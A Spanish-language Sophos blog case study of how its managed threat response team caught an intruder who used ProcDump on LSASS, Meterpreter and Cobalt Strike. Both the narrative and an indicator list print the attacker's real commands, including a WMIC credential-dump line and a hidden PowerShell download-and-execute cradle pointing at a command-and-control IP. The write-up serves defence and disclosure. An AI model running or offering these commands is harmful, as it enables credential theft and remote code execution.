Casos reales MTR: un atacante activo atrapado en el acto

ActualidadCorporateSophos Managed Threat Response (MTR)
sophos mtr

Perfil del cliente: una organización deportiva profesional con sede en EEUU, con aproximadamente 800 dispositivos.

El equipo de Sophos Managed Threat Response (MTR) ofrece funciones de búsqueda, detección y respuesta de amenazas las 24 horas del día, los 7 días de la semana, proporcionadas por un equipo de expertos como un servicio totalmente gestionado.

La pista inicial: una aguja en el pajar

En la búsqueda de eventos sospechosos, el equipo de Sophos MTR analiza decenas de millones de puntos de datos cada día aprovechando la inteligencia de amenazas, el aprendizaje automático y conjuntos de reglas complejos derivados de la experiencia de primera línea que los operadores han obtenido al responder a las amenazas día tras día.

Este análisis se realiza con el objetivo de encontrar señales que potencialmente podrían ser un indicador de un ataque. Puedes obtener más información sobre nuestra metodología de respuesta y detección de amenazas en esta entrada de blog.

En este caso, la señal fue de una herramienta legítima de Sysinternals de Microsoft. ProcDump.exe es una herramienta que suelen utilizar los desarrolladores para analizar los procesos de software en ejecución y para escribir (o “volcar”) su memoria en el disco para que pueda ser inspeccionada. Los desarrolladores encuentran esta herramienta muy útil para averiguar por qué ocurre un error.

Sin embargo, en este caso, ProcDump estaba intentando exportar el espacio de memoria de lsass.exe. Esto hizo sonar la alarma en el equipo de operaciones de Sophos MTR, que monitorea el entorno del cliente 24/7.

LSASS es el Servicio de Subsistema de Autoridad de Seguridad Local en Microsoft Windows y es responsable de hacer cumplir la política de seguridad y manejar los inicios de sesión en los sistemas Windows. Si uno escribiera su memoria en el disco, los nombres de usuario y las contraseñas de los usuarios podrían recuperarse de él.

De hecho, el equipo de Sophos MTR había detectado un indicador de ataque. Alguien estaba intentando robar credenciales.

Es posible que hayas oído hablar de Mimikatz, una herramienta cuyo único propósito es robar contraseñas, hashes, tokens de seguridad, etc. Los adversarios a veces evitan el uso de esta herramienta dada su detección generalizada por parte de productos de seguridad. Pero a diferencia de Mimikatz, ProcDump tiene usos legítimos más allá de los delictivos y, por lo tanto, los proveedores de seguridad rara vez lo detectan.

Alguien estaba tratando de no ser detectado.

Comienza la investigación

Se creó un caso en cuanto se detectó la señal, y un experto de Sophos MTR inmediatamente comenzó a investigar.

Intento de robo de credenciales

El operador examinó los datos históricos recopilados por nuestro agente y encontró el proceso que provocó la detección. El proceso intentaba invocar un comando:

C: \ Windows \ system32 \ cmd.exe / C wmic / node: “NOMBRE DEL SERVIDOR” llamada al proceso crear “C: \ PerfLogs \ procdump.exe -accepteula -ma lsass C: \ PerfLogs \ lsass.dmp”

El comando muestra el intérprete de línea de comandos de Windows cmd.exe intentando utilizar WMIC, la interfaz para Windows Management Instrumentation. WMI es una herramienta para interactuar con sistemas locales y remotos para obtener información y enviarles instrucciones.

Al llamar a un servidor remoto (redactado como “NOMBRE DEL SERVIDOR”), el comando intentaba decirle al servidor que ejecutara ProcDump y escribiera la memoria del proceso LSASS en el disco.

Afortunadamente, el operador de MTR no encontró evidencia de que se volcara a disco “lsass.dmp”, y una revisión de la telemetría de Sophos Central mostró que la tecnología de prevención de robo de credenciales de Sophos frustró con éxito el intento del adversario.

Pero, ¿de dónde vino este comando?

Intento de escalada de privilegios

El operador repasó el árbol de procesos para encontrar el padre de (es decir, lo que comenzó) cmd.exe y encontró svchost.exe, el Windows Service Host que se usa para ejecutar procesos únicos y conservar los recursos informáticos.

La misma instancia de svchost también generó otro proceso:

C: \ Windows \ system32 \ cmd.exe / c echo 4d6b1c047b2> \\. \ Pipe \ 8eaee7

Para el ojo inexperto, el comando anterior no parece malicioso. Sin embargo, este es un artefacto común que se puede observar desde la función GetSystem de Meterpreter.

El Meterpreter es una carga útil que le da a un adversario acceso interactivo de línea de comandos a un host y GetSystem es un script integrado en el Meterpreter que ayuda a un adversario a obtener privilegios completos del sistema al hacerse pasar por una “named pipe”: una tecnología que permite que los procesos se comuniquen uno con otro.

Afortunadamente, la “named pipe” que estaban tratando de explotar no existía en el sistema en ese momento.

Comando y control

Con el conocimiento de que el adversario estaba usando el Meterpreter, esto indicaría que debe tener algún tipo de conexión de red para enviar de forma remota sus comandos al host comprometido.

Al indagar en los registros de la red, el operador de MTR pudo ver una gran cantidad de conexiones salientes a la dirección IP búlgara 217.12.202.89 utilizando el puerto de red 443.

HTTPS suele utilizar el puerto 443 para conectarse de forma segura a sitios web, y los adversarios suelen utilizar este puerto para ocultarse entre el tráfico web legítimo.

Este descubrimiento inició una revisión de esa IP con sede en Bulgaria. Uno de los puertos que tenía abiertos a Internet es el puerto 50050. Este puerto es un puerto efímero, uno que no se puede registrar con IANA y, por lo tanto, no es un puerto común utilizado por servicios de red conocidos. Sin embargo, el operador de MTR había visto este puerto muchas veces antes.

El puerto 50050 es el puerto de escucha predeterminado para un servidor de escucha Cobalt Strike. Cobalt Strike es una herramienta de “emulación de amenazas” que normalmente se comercializa para los pentesters para facilitar los ataques adversarios y ayudar a las organizaciones a analizar su seguridad.

Sin embargo, los actores de amenazas maliciosas han hecho uso de esta herramienta y la utilizan para orquestar ataques reales contra víctimas inocentes.

Notificar al cliente

Solo unos minutos después de que se realizó la detección inicial, el operador de MTR completó la investigación inicial y tenía mucha confianza en que se trataba de una actividad maliciosa.

Sophos MTR ofrece tres modos de respuesta a los clientes entre los que pueden cambiar en cualquier momento:

Notificar: Sophos lleva a cabo la identificación e investigación de amenazas, informando al cliente de los hallazgos y ofreciendo recomendaciones al cliente sobre cómo responder a la amenaza.

Colaborar: Sophos lleva a cabo la identificación e investigación de amenazas y colabora en la respuesta a la amenaza, dividiendo la responsabilidad entre el cliente y el equipo de Sophos MTR.

Autorizar: Sophos identifica, investiga y responde a las amenazas y toma medidas proactivas para informar al cliente sobre lo que se detectó y las acciones de respuesta que se tomaron.

En este caso, el cliente de MTR estaba en modo de notificación. El operador se comunicó con el cliente por teléfono para discutir el descubrimiento y brindar recomendaciones sobre cómo responder a los hallazgos inmediatos antes de que continuara la investigación.

El operador de MTR compartió los descubrimientos y las cuentas de usuario apalancadas por el adversario. Estas cuentas necesitaban restablecer sus contraseñas de inmediato para deshabilitar el acceso del adversario. Además de la llamada telefónica, todos los detalles se proporcionaron en un correo electrónico para ser referenciados mientras el cliente tomaba medidas.

Continuando la detección

Con el cliente trabajando para restablecer las contraseñas de las cuentas comprometidas, el operador de MTR continuó siguiendo el viaje del adversario a través de la red del cliente. En este punto, no se había encontrado evidencia de cómo entraron.

Ten en cuenta que durante el resto de este caso, la comunicación regular entre el operador de MTR y el cliente se realizó por correo electrónico

Acechando en la nube

Un análisis más profundo del tráfico de red en el host comprometido mostró el tráfico HTTPS entre el host y otro que residía en la nube privada virtual (VPC) del cliente, donde tienen varios servidores que se conectan a la Internet pública.

Al sumergirse en los registros del servidor en la VPC, el operador de MTR detectó rápidamente más intentos de GetSystem y “named pipe impersonation”. Sin embargo, toda la evidencia apuntaba hacia los hosts comprometidos ya identificados.

Además, se identificó la ejecución de un comando de PowerShell (un lenguaje de secuencias de comandos integrado en Windows para usar con la automatización de tareas):

“C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe” -nop -w hidden -c “IEX ((objeto nuevo net.webclient) .downloadstring (‘http://217.12.202.89:80/ axdfcvgfdfgyhnhgvcdfvghjh ‘)) ”

Esta línea de comando conecta con un URL y descarga y ejecuta una carga. La URL apunta a la misma IP búlgara donde el equipo MTR encontró puertos abiertos para Cobalt Strike.

SophosLabs

El operador de MTR se acercó rápidamente a SophosLabs, la división de análisis de amenazas, inteligencia e investigación de Sophos. Al compartir el comando anterior, el operador de MTR solicitó ayuda para analizar la carga útil alojada en esa URL. En unos minutos, SophosLabs compartió sus conocimientos con Sophos MTR.

Desafortunadamente, la carga útil en cuestión ya no estaba presente: aparentemente fue eliminada por el adversario poco después de que la usaran. SophosLabs agregó rápidamente la IP y la URL a la plataforma de inteligencia en la nube que sustenta todos los productos y servicios de Sophos para que cualquier uso posterior de ese servidor de comando y control sea detectado y bloqueado en todos los clientes de Sophos.

Encontrar el acceso inicial

Finalmente, el operador de MTR identificó dónde comenzó el ataque. Continuando con el análisis de los registros del servidor de VPC, se detectó la comunicación del Protocolo de escritorio remoto (RDP) con un host desconocido dentro de la VPC. Sophos MTR no gestionaba este host desconocido ni se podía encontrar en la cuenta de Sophos Central del cliente.

El operador preguntó al cliente qué era este host desconocido y por qué no estaba bajo administración.

Parece que lo desmantelaron demasiado tarde. El adversario se había movido lateralmente del host comprometido original a otro y ejecutó el comando de PowerShell. Esto les dio acceso remoto a un nuevo host en caso de que perdieran su acceso a través de RDP.

Esto resultó ser un movimiento inteligente por parte del adversario, ya que esto es exactamente lo que sucedió.

Los servidores RDP se conectan con demasiada frecuencia a la Internet pública, lo que los convierte en el objetivo principal de los adversarios que buscan irrumpir en las redes. Una vez dentro, RDP es un método visual y ruidoso de tener acceso remoto. Los cursores en movimiento en la pantalla son una especie de obsequio.

Lo primero que un adversario buscará hacer es moverse lateralmente, a otro host, e instalar un shell inverso, una forma de que el host le devuelva la llamada y le dé acceso a la línea de comandos. El uso de la línea de comandos es un método de acceso remoto mucho más sigiloso, que les permite ocultarse en segundo plano incluso cuando un usuario está conectado y utilizando el host.

En cuanto a cuáles eran los objetivos del adversario, se desconocen. Los operadores de MTR identificaron al atacante mucho antes de que pudieran actuar en sus objetivos, capturándolos mientras aún estaban en las etapas de propagación de la red, moviéndose lateralmente e intentando escalar sus privilegios.

Después de la investigación, los operadores de MTR continuaron monitoreando el estado del cliente en busca de esta amenaza específica durante siete días más, sin identificar más actividad maliciosa o sospechosa.

El equipo de MTR luego concluyó que el adversario había sido expulsado con éxito de la red.

Caso cerrado. Al siguiente.

Más información

Para obtener más información sobre el servicio Sophos MTR, visita nuestra web o contacta con un representante de Sophos.

Si prefieres realizar tus propias búsquedas de amenazas, Sophos EDR ofrece las herramientas que necesitas para la búsqueda avanzada de amenazas y la higiene de las operaciones de seguridad de TI. Comienza hoy mismo una prueba de 30 días sin compromiso.

IOAs / IOCs

ProcDump de LSASS C:\Windows\system32\cmd.exe /C wmic /node:”SERVER NAME” el proceso crea “C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp”
Meterpreter GetSystem C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
C2 IPv4 217.12.202.89
C2 payload URL http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh
C2 port (Cobalt Strike) 50050
PowerShell descarga y ejecuta la carga de Cobalt Strike “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh’))

 

Leave a Reply

Your email address will not be published.